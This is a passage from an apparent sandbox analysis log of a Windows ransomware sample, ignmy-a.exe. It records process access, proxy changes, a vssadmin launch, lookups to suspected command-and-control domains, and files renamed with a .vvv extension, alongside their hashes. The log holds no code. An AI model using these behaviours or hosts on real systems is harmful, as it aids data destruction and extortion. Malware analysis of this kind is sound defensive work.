  9240. Setval
  9241.    
  9242. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  9243.    n\Explorer\MountPoints2\{e319f02e-31a9-11e1-9a3f-806d6172696f}\"BaseClass" = Drive
  9244.     828      
  9245. Regkey 
  9246. Setval
  9247.    
  9248. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  9249.   n\Explorer\MountPoints2\{e319f02c-31a9-11e1-9a3f-806d6172696f}\"BaseClass" = Drive
  9250.     828      
  9251. Folder 
  9252. Hide
  9253.    
  9254. C:\Documents and Settings\admin\Local Settings\History
  9255.     828      
  9256. Process
  9257. Opened
  9258.    
  9259.  
  9260. Target:   System    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9261.    
  9262. 4
  9263. 828
  9264.          
  9265. Process
  9266. Opened
  9267.    
  9268.  
  9269. Target:   C:\WINDOWS\system32\smss.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9270.    
  9271. 316
  9272. 828
  9273.          
  9274. Process
  9275. Opened
  9276.    
  9277.  
  9278. Target:   C:\WINDOWS\system32\csrss.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9279.    
  9280. 420
  9281. 828
  9282.          
  9283. Process
  9284. Opened
  9285.    
  9286.  
  9287. Target:   C:\WINDOWS\system32\winlogon.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9288.    
  9289. 444
  9290. 828
  9291.          
  9292. Process
  9293. Opened
  9294.    
  9295.  
  9296. Target:   C:\WINDOWS\system32\services.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9297.    
  9298. 552
  9299. 828
  9300.          
  9301. Process
  9302. Opened
  9303.    
  9304.  
  9305. Target:   C:\WINDOWS\system32\lsass.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9306.    
  9307. 564
  9308. 828
  9309.          
  9310. Process
  9311. Opened
  9312.    
  9313.  
  9314. Target:   C:\WINDOWS\system32\svchost.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9315.    
  9316. 716
  9317. 828
  9318.          
  9319. Process
  9320. Opened
  9321.    
  9322.  
  9323. Target:   C:\WINDOWS\system32\svchost.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9324.    
  9325. 776
  9326. 828
  9327.          
  9328. Process
  9329. Opened
  9330.    
  9331.  
  9332. Target:   C:\WINDOWS\system32\svchost.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9333.    
  9334. 840
  9335. 828
  9336.          
  9337. Process
  9338. Opened
  9339.    
  9340.  
  9341. Target:   C:\WINDOWS\system32\svchost.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9342.    
  9343. 892
  9344. 828
  9345.          
  9346. Process
  9347. Opened
  9348.    
  9349.  
  9350. Target:   C:\WINDOWS\system32\spoolsv.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9351.    
  9352. 1164
  9353. 828
  9354.          
  9355. Process
  9356. Opened
  9357.    
  9358.  
  9359. Target:   C:\WINDOWS\system32\alg.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9360.    
  9361. 1800
  9362. 828
  9363.          
  9364. Process
  9365. Opened
  9366.    
  9367.  
  9368. Target:   C:\WINDOWS\system32\wscntfy.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9369.    
  9370. 1864
  9371. 828
  9372.          
  9373. Process
  9374. Opened
  9375.    
  9376.  
  9377. Target:   C:\Program Files\Messenger\msmsgs.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9378.    
  9379. 1900
  9380. 828
  9381.          
  9382. Process
  9383. Opened
  9384.    
  9385.  
  9386. Target:   C:\WINDOWS\system32\ctfmon.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9387.    
  9388. 1924
  9389. 828
  9390.          
  9391. Process
  9392. Opened
  9393.    
  9394.  
  9395. Target:   C:\WINDOWS\explorer.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9396.    
  9397. 2684
  9398. 828
  9399.          
  9400. Process
  9401. Opened
  9402.    
  9403.  
  9404. Target:   C:\Program Files\Internet Explorer\iexplore.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9405.    
  9406. 2768
  9407. 828
  9408.          
  9409. Process
  9410. Opened
  9411.    
  9412.  
  9413. Target:   C:\Program Files\Internet Explorer\iexplore.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9414.    
  9415. 3048
  9416. 828
  9417.          
  9418. Process
  9419. Opened
  9420.    
  9421.  
  9422. Target:   C:\Program Files\Internet Explorer7\iexplore.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9423.    
  9424. 3132
  9425. 828
  9426.          
  9427. Process
  9428. Opened
  9429.    
  9430.  
  9431. Target:   C:\Program Files\Internet Explorer6\IEXPLORE.EXE    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9432.    
  9433. 3184
  9434. 828
  9435.          
  9436. Process
  9437. Opened
  9438.    
  9439.  
  9440. Target:   C:\WINDOWS\system32\wbem\wmiprvse.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9441.    
  9442. 908
  9443. 828
  9444.          
  9445. Folder 
  9446. Hide
  9447.    
  9448. C:\Documents and Settings\admin\Local Settings\History\History.IE5
  9449.     828      
  9450. File   
  9451. Open
  9452.    
  9453. C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\index.dat
  9454.     828     65536
  9455. Process
  9456. Opened
  9457.    
  9458.  
  9459. Target:   System    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9460.    
  9461. 4
  9462. 828
  9463.          
  9464. Process
  9465. Opened
  9466.    
  9467.  
  9468. Target:   C:\WINDOWS\system32\smss.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9469.    
  9470. 316
  9471. 828
  9472.          
  9473. Process
  9474. Opened
  9475.    
  9476.  
  9477. Target:   C:\WINDOWS\system32\csrss.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9478.    
  9479. 420
  9480. 828
  9481.          
  9482. Process
  9483. Opened
  9484.    
  9485.  
  9486. Target:   C:\WINDOWS\system32\winlogon.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9487.    
  9488. 444
  9489. 828
  9490.          
  9491. Process
  9492. Opened
  9493.    
  9494.  
  9495. Target:   C:\WINDOWS\system32\services.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9496.    
  9497. 552
  9498. 828
  9499.          
  9500. Process
  9501. Opened
  9502.    
  9503.  
  9504. Target:   C:\WINDOWS\system32\lsass.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9505.    
  9506. 564
  9507. 828
  9508.          
  9509. Process
  9510. Opened
  9511.    
  9512.  
  9513. Target:   C:\WINDOWS\system32\svchost.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9514.    
  9515. 716
  9516. 828
  9517.          
  9518. Process
  9519. Opened
  9520.    
  9521.  
  9522. Target:   C:\WINDOWS\system32\svchost.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9523.    
  9524. 776
  9525. 828
  9526.          
  9527. Process
  9528. Opened
  9529.    
  9530.  
  9531. Target:   C:\WINDOWS\system32\svchost.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9532.    
  9533. 840
  9534. 828
  9535.          
  9536. Process
  9537. Opened
  9538.    
  9539.  
  9540. Target:   C:\WINDOWS\system32\svchost.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9541.    
  9542. 892
  9543. 828
  9544.          
  9545. Process
  9546. Opened
  9547.    
  9548.  
  9549. Target:   C:\WINDOWS\system32\spoolsv.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9550.    
  9551. 1164
  9552. 828
  9553.          
  9554. Process
  9555. Opened
  9556.    
  9557.  
  9558. Target:   C:\WINDOWS\system32\alg.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9559.    
  9560. 1800
  9561. 828
  9562.          
  9563. Process
  9564. Opened
  9565.    
  9566.  
  9567. Target:   C:\WINDOWS\system32\wscntfy.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9568.    
  9569. 1864
  9570. 828
  9571.          
  9572. Process
  9573. Opened
  9574.    
  9575.  
  9576. Target:   C:\Program Files\Messenger\msmsgs.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9577.    
  9578. 1900
  9579. 828
  9580.          
  9581. Process
  9582. Opened
  9583.    
  9584.  
  9585. Target:   C:\WINDOWS\system32\ctfmon.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9586.    
  9587. 1924
  9588. 828
  9589.          
  9590. Process
  9591. Opened
  9592.    
  9593.  
  9594. Target:   C:\WINDOWS\explorer.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9595.    
  9596. 2684
  9597. 828
  9598.          
  9599. Process
  9600. Opened
  9601.    
  9602.  
  9603. Target:   C:\Program Files\Internet Explorer\iexplore.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9604.    
  9605. 2768
  9606. 828
  9607.          
  9608. Process
  9609. Opened
  9610.    
  9611.  
  9612. Target:   C:\Program Files\Internet Explorer\iexplore.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9613.    
  9614. 3048
  9615. 828
  9616.          
  9617. Process
  9618. Opened
  9619.    
  9620.  
  9621. Target:   C:\Program Files\Internet Explorer7\iexplore.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9622.    
  9623. 3132
  9624. 828
  9625.          
  9626. Process
  9627. Opened
  9628.    
  9629.  
  9630. Target:   C:\Program Files\Internet Explorer6\IEXPLORE.EXE    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9631.    
  9632. 3184
  9633. 828
  9634.          
  9635. Process
  9636. Opened
  9637.    
  9638.  
  9639. Target:   C:\WINDOWS\system32\wbem\wmiprvse.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9640.    
  9641. 908
  9642. 828
  9643.          
  9644. Folder 
  9645. Hide
  9646.    
  9647. C:\Documents and Settings\admin\Cookies
  9648.     828      
  9649. File   
  9650. Open
  9651.    
  9652. C:\Documents and Settings\admin\Cookies\index.dat
  9653.     828     32768
  9654. File   
  9655. Open
  9656.    
  9657. C:\Documents and Settings\admin\Local Settings\History\History.IE5\index.dat
  9658.     828     32768
  9659. File   
  9660. Failed
  9661.    
  9662. C:\Documents and Settings\admin\Application Data\ws2_32.dll
  9663.     828      
  9664. File   
  9665. Failed
  9666.    
  9667. C:\Documents and Settings\admin\Application Data\WS2HELP.dll
  9668.     828      
  9669. Regkey 
  9670. Setval
  9671.    
  9672. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\M
  9673.    UICache\"C:\WINDOWS\system32\vssadmin.exe" = Command Line Interface for Microsoft. Volume Shadow
  9674.   Copy Service
  9675.     828      
  9676. File   
  9677. Failed
  9678.    
  9679. C:\Documents and Settings\admin\Application Data\RASAPI32.dll
  9680.     828      
  9681. File   
  9682. Failed
  9683.    
  9684. C:\Documents and Settings\admin\Application Data\rasman.dll
  9685.     828      
  9686. File   
  9687. Failed
  9688.    
  9689. C:\Documents and Settings\admin\Application Data\TAPI32.dll
  9690.     828      
  9691. File   
  9692. Failed
  9693.    
  9694. C:\Documents and Settings\admin\Application Data\rtutils.dll
  9695.     828      
  9696. Regkey 
  9697. Added
  9698.    
  9699. \REGISTRY\MACHINE\Software\Microsoft\Tracing
  9700.     828      
  9701. API Call   
  9702.    
  9703.  API Name:  GetComputerNameW   Address:  0x76e96391
  9704.  Params:  [0x235fe50, 0x235fe48]
  9705.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  9706.     828      
  9707. Regkey 
  9708. Queryvalue
  9709.    
  9710. \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
  9711.     828      
  9712. API Call   
  9713.    
  9714.   API Name:  GetSystemDirectoryW   Address:  0x76ee27c6
  9715.   Params:  [0x1f1da04, 261]
  9716.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  9717.     828      
  9718. Regkey 
  9719. Added
  9720.    
  9721. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  9722.    n\Explorer\User Shell Folders
  9723.     828      
  9724. API Call   
  9725.    
  9726.   API Name:  GetComputerNameW   Address:  0x769c6a9e
  9727.   Params:  [0x1b4640, 0x1f1d474]
  9728.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  9729.     828      
  9730. File   
  9731. Failed
  9732.    
  9733. C:\Documents and Settings\admin\Application Data\msapsspc.dll
  9734.     828      
  9735. File   
  9736. Failed
  9737.    
  9738. C:\DOCUME~1\admin\LOCALS~1\Temp\msapsspc.dll
  9739.     828      
  9740. Regkey 
  9741. Queryvalue
  9742.    
  9743. \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
  9744.     828      
  9745. Regkey 
  9746. Added
  9747.    
  9748. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows NT\CurrentVer
  9749.   sion\Winlogon
  9750.     828      
  9751. File   
  9752. Failed
  9753.    
  9754. C:\Documents and Settings\admin\Application Data\schannel.dll
  9755.     828      
  9756. File   
  9757. Failed
  9758.    
  9759. C:\DOCUME~1\admin\LOCALS~1\Temp\schannel.dll
  9760.     828      
  9761. File   
  9762. Failed
  9763.    
  9764. C:\Documents and Settings\admin\Application Data\digest.dll
  9765.     828      
  9766. File   
  9767. Failed
  9768.    
  9769. C:\DOCUME~1\admin\LOCALS~1\Temp\digest.dll
  9770.     828      
  9771. File   
  9772. Failed
  9773.    
  9774. C:\Documents and Settings\admin\Application Data\msnsspc.dll
  9775.     828      
  9776. File   
  9777. Failed
  9778.    
  9779. C:\DOCUME~1\admin\LOCALS~1\Temp\msnsspc.dll
  9780.     828      
  9781. Regkey 
  9782. Added
  9783.    
  9784. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  9785.   n\Explorer\Shell Folders
  9786.     828      
  9787. Regkey 
  9788. Setval
  9789.    
  9790. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  9791.   n\Explorer\Shell Folders\"AppData" = C:\Documents and Settings\admin\Application Data
  9792.     828      
  9793. File   
  9794. Failed
  9795.    
  9796. C:\Documents and Settings\admin\Application Data\Microsoft\NETWORK\CONNECTIONS\PBK
  9797.     828      
  9798. File   
  9799. Failed
  9800.    
  9801. C:\Documents and Settings\admin\Application Data\iphlpapi.dll
  9802.     828      
  9803. File   
  9804. Find
  9805.    
  9806. C:\*
  9807.     828      
  9808. File   
  9809. Failed
  9810.    
  9811. C:\Documents and Settings\admin\Application Data\sensapi.dll
  9812.     828      
  9813. Regkey 
  9814. Added
  9815.    
  9816. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\windows\CurrentVersio
  9817.    n\Internet Settings\Connections
  9818.     828      
  9819. 2 Repeated items skipped
  9820. Regkey 
  9821. Added
  9822.    
  9823. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\windows\CurrentVersio
  9824.    n\Internet Settings
  9825.     828      
  9826. Regkey 
  9827. Setval
  9828.    
  9829. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  9830.    n\Internet Settings\"ProxyEnable" = 0x00000000
  9831.     828      
  9832. Regkey 
  9833. Setval
  9834.    
  9835. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  9836.   n\Internet Settings\"ProxyServer" = 10.0.0.2:8080
  9837.     828      
  9838. Regkey 
  9839. Deleteval
  9840.    
  9841. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  9842.    n\Internet Settings\"ProxyOverride"
  9843.     828      
  9844. Regkey 
  9845. Deleteval
  9846.    
  9847. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  9848.   n\Internet Settings\"AutoConfigURL"
  9849.     828      
  9850. Regkey 
  9851. Added
  9852.    
  9853. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\windows\CurrentVersio
  9854.    n\Internet Settings\Connections
  9855.     828      
  9856. 2 Repeated items skipped
  9857. Regkey 
  9858. Setval
  9859.    
  9860. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  9861.    n\Internet Settings\Connections\"SavedLegacySettings" = 46 00 00 00 1d 00 00 00 01 00 00 00 0d 00
  9862.    00 00 31 30 2e 30 2e 30 2e 32 3a 38 30 38 30 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 c0
  9863.   7e dd d3 73 dc cc 01 01 00 00 00 0a 00 02 0f 00 00 00 00 00 00 00 00 00 00 00 00
  9864.     828      
  9865. API Call   
  9866.    
  9867.  API Name:  Sleep   Address:  0x0041f00b
  9868.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  9869.     828      
  9870. Regkey 
  9871. Added
  9872.    
  9873. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\SOFTWARE\Microsoft\Windows NT\CurrentVer
  9874.   sion\Network\Location Awareness
  9875.     828      
  9876. File   
  9877. Failed
  9878.    
  9879. C:\Documents and Settings\admin\Application Data\rasadhlp.dll
  9880.     828      
  9881. Regkey 
  9882. Added
  9883.    
  9884. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\windows\CurrentVersio
  9885.   n\Internet Settings\Connections
  9886.     828      
  9887. Regkey 
  9888. Added
  9889.    
  9890. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\windows\CurrentVersio
  9891.   n\Internet Settings
  9892.     828      
  9893. Regkey 
  9894. Setval
  9895.    
  9896. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  9897.   n\Internet Settings\"ProxyEnable" = 0x00000000
  9898.     828      
  9899. Regkey 
  9900. Setval
  9901.    
  9902. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  9903.    n\Internet Settings\"ProxyServer" = 10.0.0.2:8080
  9904.     828      
  9905. Regkey 
  9906. Deleteval
  9907.    
  9908. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  9909.   n\Internet Settings\"ProxyOverride"
  9910.     828      
  9911. Regkey 
  9912. Deleteval
  9913.    
  9914. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  9915.    n\Internet Settings\"AutoConfigURL"
  9916.     828      
  9917. Regkey 
  9918. Added
  9919.    
  9920. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\windows\CurrentVersio
  9921.   n\Internet Settings\Connections
  9922.     828      
  9923. 2 Repeated items skipped
  9924. Regkey 
  9925. Setval
  9926.    
  9927. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  9928.   n\Internet Settings\Connections\"SavedLegacySettings" = 46 00 00 00 1e 00 00 00 01 00 00 00 0d 00
  9929.     00 00 31 30 2e 30 2e 30 2e 32 3a 38 30 38 30 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 c0
  9930.    7e dd d3 73 dc cc 01 01 00 00 00 0a 00 02 0f 00 00 00 00 00 00 00 00 00 00 00 00
  9931.     828      
  9932. Process
  9933. Started
  9934.    
  9935. C:\WINDOWS\system32\vssadmin.exe
  9936.   Parentname:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  9937.   Command Line:  "C:\WINDOWS\system32\vssadmin.exe"\"ComputerName"
  9938.     1352         
  9939. Network
  9940. Dns  Query  Answer
  9941.    
  9942.  Protocol  Type:  udp   IP Address:  199.16.199.6   Hostname:  woodenden.com
  9943.  Imagepath:  c:\Documents and Settings\admin\Application Data\ignmy-a.exe
  9944.     828      
  9945. API Call   
  9946.    
  9947.  API Name:  GetSystemTime   Address:  0x63004857
  9948.  Params:  [0x1f1e148]
  9949.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  9950.     828      
  9951. API Call   
  9952.    
  9953.  API Name:  SystemTimeToFileTime   Address:  0x63004862
  9954.  Params:  [0x1f1e148, 0x1f1e17c]
  9955.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  9956.     828      
  9957. API Call   
  9958.    
  9959.  API Name:  GetSystemDirectoryA   Address:  0x76f28a9e
  9960.  Params:  [0x1f1c208, 260]
  9961.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  9962.     828      
  9963. Network
  9964. Http  Request
  9965.    
  9966.  Protocol  Type:  tcp   Destination  Port:  80   IP Address:  199.16.199.6
  9967.  Imagepath:  c:\Documents and Settings\admin\Application Data\ignmy-a.exe
  9968.     828      
  9969. Network
  9970. Dns  Query
  9971.    
  9972.  Protocol  Type:  udp   Qtype:  Host Address   Hostname:  leboudoirdesbrunettes.com
  9973.  Imagepath:  c:\Documents and Settings\admin\Application Data\ignmy-a.exe
  9974.     828      
  9975. Network
  9976. Dns  Query  Answer
  9977.    
  9978.  Protocol  Type:  udp   IP Address:  199.16.199.7   Hostname:  leboudoirdesbrunettes.com
  9979.  Imagepath:  c:\Documents and Settings\admin\Application Data\ignmy-a.exe
  9980.     828      
  9981. Process
  9982. Terminated
  9983.    
  9984. C:\WINDOWS\system32\vssadmin.exe
  9985.  Parentname:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  9986.  Command Line:  N/A
  9987.     1352    828  
  9988. Network
  9989. Http  Request
  9990.    
  9991.  Protocol  Type:  tcp   Destination  Port:  80   IP Address:  199.16.199.7
  9992.  Imagepath:  c:\Documents and Settings\admin\Application Data\ignmy-a.exe
  9993.     828      
  9994. Ransom 
  9995.    
  9996. C:\437mkrQZcep1\aimtSf.txt
  9997. MD5:  4d8ae4cfa1959034def1a7b1172bc2c6
  9998.              
  9999. Malicious  Alert   
  10000. Ransomware
  10001.    
  10002. Message:   Ransomware Activity    Detail:   Ransomware Activity  
  10003.              
  10004. Malicious  Alert   
  10005. Misc  Anom
  10006.    
  10007. Message:   Ransomware Activity    Detail:   Ransomware Activity  
  10008.              
  10009. Ransom 
  10010.    
  10011. C:\437mkrQZcep1\hFJrzldGEg.jpg
  10012. MD5:  4e4b1a9f927eccff628b530d163abff3
  10013.              
  10014. Ransom 
  10015.    
  10016. C:\437mkrQZcep1\LMhaa.xls
  10017. MD5:  80a3050f59fdf86c8799a450fb2259f1
  10018.              
  10019. Ransom 
  10020.    
  10021. C:\437mkrQZcep1\MgVpgAw.png
  10022. MD5:  6a9d07d0d215d8f2bca5d17730cc171c
  10023.              
  10024. Ransom 
  10025.    
  10026. C:\437mkrQZcep1\niapTyWw.doc
  10027. MD5:  68ef5047b50cb918de6b0c5d49120d14
  10028.              
  10029. Ransom 
  10030.    
  10031. C:\437mkrQZcep1\QYVP-.ppt
  10032. MD5:  cb794d01ce6abf437c0281b5c919c210
  10033.              
  10034. Ransom 
  10035.    
  10036. C:\a56VrfDAirK2\aZtoVT.ppt
  10037. MD5:  eccf91abf2b875e694917709601840bf
  10038.              
  10039. Ransom 
  10040.    
  10041. C:\a56VrfDAirK2\MNQnQ.xls
  10042. MD5:  977495f83b1cf06c8563ff789645232a
  10043.              
  10044. Ransom 
  10045.    
  10046. C:\a56VrfDAirK2\prPKnbyNJ.jpg
  10047. MD5:  ad5fb195268d429c34e4769f59754674
  10048.              
  10049. Ransom 
  10050.    
  10051. C:\a56VrfDAirK2\YiYsgUwK.doc
  10052. MD5:  de02e50e19b4d8a768fc0c2cea5019ae
  10053.              
  10054. File   
  10055. Find
  10056.    
  10057. C:\Documents and Settings\*
  10058.     828      
  10059. File   
  10060. Find
  10061.    
  10062. C:\Documents and Settings\*\*
  10063.     828      
  10064. File   
  10065. Find
  10066.    
  10067. C:\Documents and Settings\*\Application Data\*
  10068.     828      
  10069. File   
  10070. Open
  10071.    
  10072. C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\10.0\TMGrpPrm.sav
  10073.     828     566
  10074. File   
  10075. Close
  10076.    
  10077. C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\10.0\TMGrpPrm.sav
  10078.  MD5:  f4fd8bc8cf02daf4ad9301e5706cafad
  10079.  SHA1: 24ef513cdd97e97fb35b97febb6d8242f145dd11
  10080.     828     990
  10081. File   
  10082. Rename
  10083.    
  10084. Old Name:   C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\10.0\TMGrpPrm.sav
  10085. New Name:   C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\10.0\TMGrpPrm.sav.vvv
  10086.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10087.  MD5:  f4fd8bc8cf02daf4ad9301e5706cafad
  10088.  SHA1: 24ef513cdd97e97fb35b97febb6d8242f145dd11
  10089.     828     990
  10090. File   
  10091. Open
  10092.    
  10093. C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\11.0\TMGrpPrm.sav
  10094.     828     566
  10095. File   
  10096. Close
  10097.    
  10098. C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\11.0\TMGrpPrm.sav
  10099.  MD5:  f4fd8bc8cf02daf4ad9301e5706cafad
  10100.  SHA1: 24ef513cdd97e97fb35b97febb6d8242f145dd11
  10101.     828     990
  10102. File   
  10103. Rename
  10104.    
  10105. Old Name:   C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\11.0\TMGrpPrm.sav
  10106. New Name:   C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\11.0\TMGrpPrm.sav.vvv
  10107.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10108.  MD5:  f4fd8bc8cf02daf4ad9301e5706cafad
  10109.  SHA1: 24ef513cdd97e97fb35b97febb6d8242f145dd11
  10110.     828     990
  10111. File   
  10112. Open
  10113.    
  10114. C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\JavaScripts\glob.settings.js
  10115.     828     10
  10116. File   
  10117. Close
  10118.    
  10119. C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\JavaScripts\glob.settings.js
  10120.  MD5:  2cf3092e1b8c9eb71c0d59bfe5e05b79
  10121.  SHA1: 1844f46ab3fa930896d9ef403c475a38bca8bda4
  10122.     828     430
  10123. File   
  10124. Rename
  10125.    
  10126. Old Name:   C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\JavaScripts\glob.settings.js
  10127. New Name:   C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\JavaScripts\glob.settings.js.vvv
  10128.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10129.  MD5:  2cf3092e1b8c9eb71c0d59bfe5e05b79
  10130.  SHA1: 1844f46ab3fa930896d9ef403c475a38bca8bda4
  10131.     828     430
  10132. File   
  10133. Open
  10134.    
  10135. C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\TMGrpPrm.sav
  10136.     828     566
  10137. File   
  10138. Close
  10139.    
  10140. C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\TMGrpPrm.sav
  10141.  MD5:  f4fd8bc8cf02daf4ad9301e5706cafad
  10142.  SHA1: 24ef513cdd97e97fb35b97febb6d8242f145dd11
  10143.     828     990
  10144. File   
  10145. Rename
  10146.    
  10147. Old Name:   C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\TMGrpPrm.sav
  10148. New Name:   C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\TMGrpPrm.sav.vvv
  10149.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10150.  MD5:  f4fd8bc8cf02daf4ad9301e5706cafad
  10151.  SHA1: 24ef513cdd97e97fb35b97febb6d8242f145dd11
  10152.     828     990
  10153. File   
  10154. Open
  10155.    
  10156. C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\udlog.txt
  10157.     828     774
  10158. File   
  10159. Close
  10160.    
  10161. C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\udlog.txt
  10162.  MD5:  470073e1dd1beba9d5a04b19a0318f70
  10163.  SHA1: f07f6682e9172f35c162dbfb290374b0498936a8
